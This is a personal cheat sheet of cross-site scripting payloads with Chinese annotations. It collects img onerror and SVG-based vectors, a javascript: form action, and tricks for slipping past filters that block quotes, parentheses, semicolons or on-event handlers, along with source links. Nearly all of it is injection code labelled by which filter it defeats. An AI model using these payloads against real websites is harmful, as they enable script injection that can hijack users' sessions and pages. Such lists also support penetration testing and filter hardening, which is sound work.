<img src="1" onerror=location="javascript:alert%281%29">
SVG:
<svg xmlns="http://www.w3.org/2000/svg">
<g onload="javascript:alert(1)"></g>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
<animation xlink:href="javascript:alert(1)"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
<foreignObject xlink:href="javascript:alert(1)"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
<set attributeName="onmouseover" to="alert(1)"/>
</svg>
<svg xmlns="http://www.w3.org/2000/svg">
<handler xmlns:ev="http://www.w3.org/2001/xmlevents" ev:event="load">alert(1)</handler>
</svg>
收集的URL:
/*
https://github.com/cure53/H5SC
http://www.codeceo.com/article/12-funny-xss-vector.html
http://www.freebuf.com/articles/web/20282.html
https://jiji262.github.io/wooyun_articles/drops/Bypass xss过滤的测试方法.html
实体编码: https://dev.w3.org/html5/html-author/charref
*/
无on事件:
<form><button formaction=javascript:alert(1)>CLICKME
= ' " 过滤:
<script>document.write(String.fromCharCode(XSSCode));</script>
= ( ) ; :被同时过滤:
<svg><script>alert(/1/)</script>
|------------------------------------------|
|---终于知道svg和script一起用是什么感觉了 ---|
|--- 想怎么编码就怎么编码,吊吊吊 ---|
|--- 不过只有HTML编码可用 ---|
|------------------------------------------|
多行绕过:
<svg /*I am hidden*/onload=alert(1)
也可以进行编码进一步绕过:
<svg onload=
alert(1)

 
 第一个又能绕过正则对#的判断
USING document.write()
document.write(prompt(1)); //以前没怎么碰到过, 也没实验